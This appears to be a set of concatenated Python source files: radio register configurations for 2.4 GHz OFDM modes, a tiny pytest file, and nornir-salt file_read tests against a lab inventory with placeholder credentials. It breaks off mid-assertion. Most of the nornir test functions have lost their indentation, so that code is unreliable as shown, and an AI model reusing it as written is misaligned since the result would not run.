(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x1E), # NO FCS FILTER in RX, FCS automatically added in TX, FCS 2 bytes
(RG_BBC1_OFDMC, 0x00),
(RG_BBC1_OFDMPHRTX, 0x02)],
# 2400MHz_ofdm_1_mcs3
'2400MHz_ofdm_800kbps_1200kHz_mcs3': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x1A),
(RG_RF24_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x83),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x1E), # NO FCS FILTER in RX, FCS automatically added in TX, FCS 2 bytes
(RG_BBC1_OFDMC, 0x00),
(RG_BBC1_OFDMPHRTX, 0x03)],
# 2400MHz_ofdm_2_mcs0
'2400MHz_ofdm_50kbps_800kHz_mcs0': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x00)],
# 2400MHz_ofdm_2_mcs1
'2400MHz_ofdm_100kbps_800kHz_mcs1': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x01)],
# 2400MHz_ofdm_2_mcs2
'2400MHz_ofdm_200kbps_800kHz_mcs2': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x02)],
# 2400MHz_ofdm_2_mcs3
'2400MHz_ofdm_400kbps_800kHz_mcs3': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x03)],
# 2400MHz_ofdm_2_mcs4
'2400MHz_ofdm_600kbps_800kHz_mcs4': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x04)],
# 2400MHz_ofdm_2_mcs5
'2400MHz_ofdm_800kbps_800kHz_mcs5': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x17),
(RG_RF24_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x08), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x63),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x01),
(RG_BBC1_OFDMPHRTX, 0x05)],
# 2400MHz_ofdm_3_mcs1
'2400MHz_ofdm_50kbps_400kHz_mcs1': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x01)],
# 2400MHz_ofdm_3_mcs2
'2400MHz_ofdm_100kbps_400kHz_mcs2': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x02)],
# 2400MHz_ofdm_3_mcs3
'2400MHz_ofdm_200kbps_400kHz_mcs3': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x03)],
# 2400MHz_ofdm_3_mcs4
'2400MHz_ofdm_300kbps_400kHz_mcs4': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x04)],
# 2400MHz_ofdm_3_mcs5
'2400MHz_ofdm_400kbps_400kHz_mcs5': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x05)],
# 2400MHz_ofdm_3_mcs6
'2400MHz_ofdm_600kbps_400kHz_mcs6': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x15),
(RG_RF24_RXDFE, 0x66),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x05), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x66),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x02),
(RG_BBC1_OFDMPHRTX, 0x06)],
# 2400MHz_ofdm_4_mcs2
'2400MHz_ofdm_50kbps_200kHz_mcs2': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x03),
(RG_RF24_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x03), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x46),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x03),
(RG_BBC1_OFDMPHRTX, 0x02)],
# 2400MHz_ofdm_4_mcs3
'2400MHz_ofdm_100kbps_200kHz_mcs3': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x03),
(RG_RF24_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x03), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x46),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x03),
(RG_BBC1_OFDMPHRTX, 0x03)],
# 2400MHz_ofdm_4_mcs4
'2400MHz_ofdm_150kbps_200kHz_mcs4': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x03),
(RG_RF24_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x03), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x46),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x03),
(RG_BBC1_OFDMPHRTX, 0x04)],
# 2400MHz_ofdm_4_mcs5
'2400MHz_ofdm_200kbps_200kHz_mcs5': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x03),
(RG_RF24_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x03), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x46),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x03),
(RG_BBC1_OFDMPHRTX, 0x05)],
# 2400MHz_ofdm_4_mcs6
'2400MHz_ofdm_300kbps_200kHz_mcs6': [
(RG_RF24_CMD, 0x02),
(RG_RF09_IRQM, 0x00),
(RG_RF24_IRQM, 0x1F),
(RG_RF24_RXBWC, 0x03),
(RG_RF24_RXDFE, 0x26),
# (RG_RF09_AGCC, 0x11),
(RG_RF24_EDD, 0x7A),
(RG_RF24_TXCUTC, 0x03), # recommended value (0x0B)
(RG_RF24_TXDFE, 0x46),
(RG_RF24_PAC, 0x7D), # Tx power in lower 5 bits (max 0x1F); 0x7D -> TXPWR=0x1D (~8 dBm)
(RG_BBC0_IRQM, 0x00),
(RG_BBC1_IRQM, 0x12),
(RG_BBC1_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC1_OFDMC, 0x03),
(RG_BBC1_OFDMPHRTX, 0x06)]
}

# test/test_init.py from SasiDharKM/CSC510-Team14 (MIT license)
import code as cd

def test_answer_fail():
assert cd.inc(3) == 5
def test_answer_pass():
assert cd.inc(4) == 5

# test/test_files_task_plugins.py from dmulyalin/nornir-salt (MIT license)
import sys
import os
import pprint
import logging
import yaml
import pytest
import time
import json
sys.path.insert(0, "..")
try:
from nornir import InitNornir
from nornir.core.plugins.inventory import InventoryPluginRegister
from nornir.core.task import Result
HAS_NORNIR = True
except ImportError:
HAS_NORNIR = False
from nornir_salt import ResultSerializer
from nornir_salt import DictInventory
from nornir_salt import nr_test
from nornir_salt.plugins.processors.ToFileProcessor import ToFileProcessor
from nornir_salt.plugins.processors.DataProcessor import DataProcessor
from nornir_salt.plugins.tasks import file_read, file_remove, file_list, file_diff, files
logging.basicConfig(level=logging.ERROR)
# ----------------------------------------------------------------------
# Initialize Nornir
# ----------------------------------------------------------------------
skip_if_no_nornir = pytest.mark.skipif(
    not HAS_NORNIR,
    reason="Failed to import all required Nornir modules and plugins",
)
skip_if_no_lab = None
lab_inventory = """
hosts:
IOL1:
hostname: 192.168.217.10
platform: ios
groups: [lab]
IOL2:
hostname: 192.168.217.7
platform: ios
groups: [lab]
groups:
lab:
username: cisco
password: cisco
defaults: {}
"""
lab_inventory_dict = yaml.safe_load(lab_inventory)
def init(opts):
    """
    Initialize Nornir by calling InitNornir()
    """
    nr = InitNornir(
        logging={"enabled": False},
        runner={"plugin": "serial"},
        inventory={
            "plugin": "DictInventory",
            "options": {
                "hosts": opts["hosts"],
                "groups": opts.get("groups", {}),
                "defaults": opts.get("defaults", {}),
            },
        },
    )
    return nr
InventoryPluginRegister.register("DictInventory", DictInventory)
nr = init(lab_inventory_dict)
def clean_up_folder():
    # remove previous files and folder
    if os.path.exists("./tofile_outputs/"):
        for filen in os.listdir("./tofile_outputs/"):
            os.remove("./tofile_outputs/" + filen)
        os.rmdir("./tofile_outputs/")
def nr_test_grouped_subtasks(task, task_1, task_2):
    """
    Test grouped task
    """
    task.run(**task_1)
    task.run(**task_2)
    return Result(host=task.host, skip_results=True)
def generate_files(tf):
    """
    Helper function to generate files by running task
    """
    iol1_res_ntp = [
        {"ntp": "1.1.1.1"},
    ]
    iol2_res_ntp = [
        {"ntp": "2.2.2.2"},
    ]
    iol1_res_log = [
        {"log": "3.3.3.3"},
    ]
    iol2_res_log = [
        {"log": "4.4.4.4"},
    ]
    # run test to generate the file
    nr_with_tf = nr.with_processors(
        [ToFileProcessor(tf=tf, base_url="./tofile_outputs/")]
    )
    # first task run
    nr_with_tf.run(
        task=nr_test_grouped_subtasks,
        task_1={
            "task": nr_test,
            "ret_data_per_host": {
                "IOL1": iol1_res_ntp,
                "IOL2": iol2_res_ntp,
            },
            "name": "show run | inc ntp",
        },
        task_2={
            "task": nr_test,
            "ret_data_per_host": {
                "IOL1": iol1_res_log,
                "IOL2": iol2_res_log,
            },
            "name": "show run | inc logging",
        },
    )
# ----------------------------------------------------------------------
# tests that need Nornir
# ----------------------------------------------------------------------
@skip_if_no_nornir
def test_file_read_task():
    clean_up_folder()
    iol1_res = """
Timestamp 12:12:12
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
    iol2_res = """
ntp server 7.7.7.7
"""
    # run test to generate the file
    nr_with_tf = nr.with_processors(
        [ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
    )
    output = nr_with_tf.run(
        task=nr_test,
        ret_data_per_host={
            "IOL1": iol1_res,
            "IOL2": iol2_res,
        },
        name="show run | inc ntp",
    )
    # retrieve file content
    res = nr.run(
        task=file_read,
        filegroup="config_for_read",
        base_url="./tofile_outputs/",
    )
    res = ResultSerializer(res, add_details=True)
    # pprint.pprint(res)
    # {'IOL1': {'show run | inc ntp': {'changed': False,
    #                                  'diff': '',
    #                                  'exception': None,
    #                                  'failed': False,
    #                                  'result': '\n'
    #                                            'Timestamp 12:12:12\n'
    #                                            'ntp server 7.7.7.8\n'
    #                                            'ntp server 7.7.7.7\n'}},
    #  'IOL2': {'show run | inc ntp': {'changed': False,
    #                                  'diff': '',
    #                                  'exception': None,
    #                                  'failed': False,
    #                                  'result': '\nntp server 7.7.7.7\n'}}}
    assert res["IOL1"]["show run | inc ntp"]["result"] == iol1_res
    assert res["IOL2"]["show run | inc ntp"]["result"] == iol2_res


# test_file_read_task()
@skip_if_no_nornir
def test_file_read_task_last2():
    clean_up_folder()
    iol1_res = """
Timestamp 12:12:12
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
    iol2_res = """
ntp server 7.7.7.7
"""
    # run test to generate the file
    nr_with_tf = nr.with_processors(
        [ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
    )
    # first task run
    nr_with_tf.run(
        task=nr_test,
        ret_data_per_host={
            "IOL1": iol1_res,
            "IOL2": iol2_res,
        },
        name="show run | inc ntp",
    )
    # second, most recent/latest run
    nr_with_tf.run(
        task=nr_test,
        ret_data_per_host={
            "IOL1": iol1_res + "IOL1 12345",
            "IOL2": iol2_res + "IOL2 12345",
        },
        name="show run | inc ntp",
    )
    # retrieve file content
    res1 = nr.run(
        task=file_read,
        filegroup="config_for_read",
        base_url="./tofile_outputs/",
        last=1,
    )
    res2 = nr.run(
        task=file_read,
        filegroup="config_for_read",
        base_url="./tofile_outputs/",
        last=2,
    )
    res1 = ResultSerializer(res1, add_details=True)
    res2 = ResultSerializer(res2, add_details=True)
    # pprint.pprint(res1)
    # pprint.pprint(res2)
    assert res2["IOL1"]["show run | inc ntp"]["result"] == iol1_res
    assert res2["IOL2"]["show run | inc ntp"]["result"] == iol2_res
    assert res1["IOL1"]["show run | inc ntp"]["result"] == iol1_res + "IOL1 12345"
    assert res1["IOL2"]["show run | inc ntp"]["result"] == iol2_res + "IOL2 12345"


# test_file_read_task_last2()
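The `last=N` semantics exercised above (`last=1` is the newest snapshot, `last=2` the one before it) can be sketched as a newest-first lookup over saved snapshots. This is an illustration only, not nornir-salt's actual bookkeeping:

```python
# Illustration only (not nornir-salt's implementation): "last=N" selects
# the N-th most recent saved snapshot, with last=1 being the newest.
snapshots = ["run_1.txt", "run_2.txt", "run_3.txt"]  # oldest .. newest


def get_last(snaps, last=1):
    # negative indexing gives newest-first access: -1 newest, -2 previous
    return snaps[-last]
```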
@skip_if_no_nornir
def test_file_read_result_with_subtasks():
clean_up_folder()
iol1_res_ntp = """
Timestamp 12:12:12
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol2_res_ntp = """
ntp server 7.7.7.7
"""
iol1_res_log = """
logging host 1.2.3.4
logging host 4.4.4.4
"""
iol2_res_log = """
logging host 5.5.5.5
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test_grouped_subtasks,
task_1={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_ntp,
"IOL2": iol2_res_ntp,
},
"name": "show run | inc ntp",
},
task_2={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_log,
"IOL2": iol2_res_log,
},
"name": "show run | inc logging",
},
)
# retrieve file content
res = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
# {'IOL1': {'show run | inc logging': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\n'
# 'logging host 1.2.3.4\n'
# 'logging host 4.4.4.4\n'
# ' '},
# 'show run | inc ntp': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\n'
# 'Timestamp 12:12:12\n'
# '\n'
# 'ntp server 7.7.7.8\n'
# 'ntp server 7.7.7.7\n'
# ' '}},
# 'IOL2': {'show run | inc logging': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\n'
# 'logging host 5.5.5.5\n'
# ' '},
# 'show run | inc ntp': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\nntp server 7.7.7.7\n '}}}
assert res["IOL1"]["show run | inc ntp"]["result"] == iol1_res_ntp
assert res["IOL1"]["show run | inc logging"]["result"] == iol1_res_log
assert res["IOL2"]["show run | inc ntp"]["result"] == iol2_res_ntp
assert res["IOL2"]["show run | inc logging"]["result"] == iol2_res_log
# test_file_read_result_with_subtasks()
@skip_if_no_nornir
def test_file_read_result_with_subtasks_task_name():
""" Should return task results for one task only """
clean_up_folder()
iol1_res_ntp = """
Timestamp 12:12:12
ntp server 7.7.7.8
ntp server 7.7.7.7
"""
iol2_res_ntp = """
ntp server 7.7.7.7
"""
iol1_res_log = """
logging host 1.2.3.4
logging host 4.4.4.4
"""
iol2_res_log = """
logging host 5.5.5.5
"""
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test_grouped_subtasks,
task_1={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_ntp,
"IOL2": iol2_res_ntp,
},
"name": "show run | inc ntp",
},
task_2={
"task": nr_test,
"ret_data_per_host": {
"IOL1": iol1_res_log,
"IOL2": iol2_res_log,
},
"name": "show run | inc logging",
},
)
# retrieve file content
res = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
task_name="show run | inc logging"
)
res = ResultSerializer(res, add_details=True)
pprint.pprint(res)
# {'IOL1': {'show run | inc logging': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\n'
# 'logging host 1.2.3.4\n'
# 'logging host 4.4.4.4\n'
# ' '}},
# 'IOL2': {'show run | inc logging': {'changed': False,
# 'diff': '',
# 'exception': None,
# 'failed': False,
# 'result': '\n'
# 'logging host 5.5.5.5\n'
# ' '}}}
assert "show run | inc ntp" not in res["IOL1"]
assert res["IOL1"]["show run | inc logging"]["result"] == iol1_res_log
assert "show run | inc ntp" not in res["IOL2"]
assert res["IOL2"]["show run | inc logging"]["result"] == iol2_res_log
# test_file_read_result_with_subtasks_task_name()
@skip_if_no_nornir
def test_file_read_task_struct_data():
""" test that structured data save as a json and read back in struct """
clean_up_folder()
iol1_res = [
{"ip": "1.2.3.4", "interface": "Gi123"},
{"ip": "2.2.2.2", "interface": "Gi2"},
{"ip": "3.3.3.3", "interface": "Gi3"},
]
iol2_res = [
{"ip": "4.4.4.4", "interface": "Gi2"},
]
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
output = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res,
"IOL2": iol2_res,
},
name="show run | inc ntp",
)
# retrieve file content
res = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
)
res = ResultSerializer(res, add_details=True)
# pprint.pprint(res)
_ = res["IOL1"]['show run | inc ntp'].pop("timestamp")
_ = res["IOL2"]['show run | inc ntp'].pop("timestamp")
assert res == {'IOL1': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi123',
'ip': '1.2.3.4'},
{'interface': 'Gi2',
'ip': '2.2.2.2'},
{'interface': 'Gi3',
'ip': '3.3.3.3'}]}},
'IOL2': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi2',
'ip': '4.4.4.4'}]}}}
# test_file_read_task_struct_data()
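The reason the structured results above come back as lists of dicts rather than strings is that JSON serialization round-trips such data without losing structure; a minimal standalone sketch:

```python
# Minimal sketch: JSON round-trips lists of dicts intact, which is why
# structured task results can be saved to file and read back unchanged.
import json

data = [
    {"ip": "1.2.3.4", "interface": "Gi123"},
    {"ip": "2.2.2.2", "interface": "Gi2"},
]
restored = json.loads(json.dumps(data))
```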
@skip_if_no_nornir
def test_file_read_task_struct_data_last2():
clean_up_folder()
iol1_res = [
{"ip": "1.2.3.4", "interface": "Gi123"},
{"ip": "2.2.2.2", "interface": "Gi2"},
{"ip": "3.3.3.3", "interface": "Gi3"},
]
iol2_res = [
{"ip": "4.4.4.4", "interface": "Gi2"},
]
iol1_res_1 = [
{"ip": "1.2.3.4", "interface": "Gi123"},
{"ip": "3.3.3.3", "interface": "Gi3"},
]
iol2_res_1 = [
{"ip": "4.4.4.4", "interface": "Gi2"},
{"ip": "2.2.2.2", "interface": "Gi2"},
]
# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="config_for_read", base_url="./tofile_outputs/")]
)
# first task run
nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res,
"IOL2": iol2_res,
},
name="show run | inc ntp",
)
    # second, most current/latest run - changed IOL1/IOL2 results
nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_1,
"IOL2": iol2_res_1,
},
name="show run | inc ntp",
)
# retrieve file content
res1 = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
last=1,
)
res2 = nr.run(
task=file_read,
filegroup="config_for_read",
base_url="./tofile_outputs/",
last=2,
)
res_last_1 = ResultSerializer(res1, add_details=True)
res_last_2 = ResultSerializer(res2, add_details=True)
pprint.pprint(res_last_1)
pprint.pprint(res_last_2)
_ = res_last_1["IOL1"]['show run | inc ntp'].pop("timestamp")
_ = res_last_1["IOL2"]['show run | inc ntp'].pop("timestamp")
_ = res_last_2["IOL1"]['show run | inc ntp'].pop("timestamp")
_ = res_last_2["IOL2"]['show run | inc ntp'].pop("timestamp")
assert res_last_1 == {'IOL1': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi123',
'ip': '1.2.3.4'},
{'interface': 'Gi3',
'ip': '3.3.3.3'}]}},
'IOL2': {'show run | inc ntp': {'changed': False,
'diff': '',
'exception': None,
'failed': False,
'filegroup': 'config_for_read',
'result': [{'interface': 'Gi2',
'ip': '4.4.4.4'},
{'interface': 'Gi2',
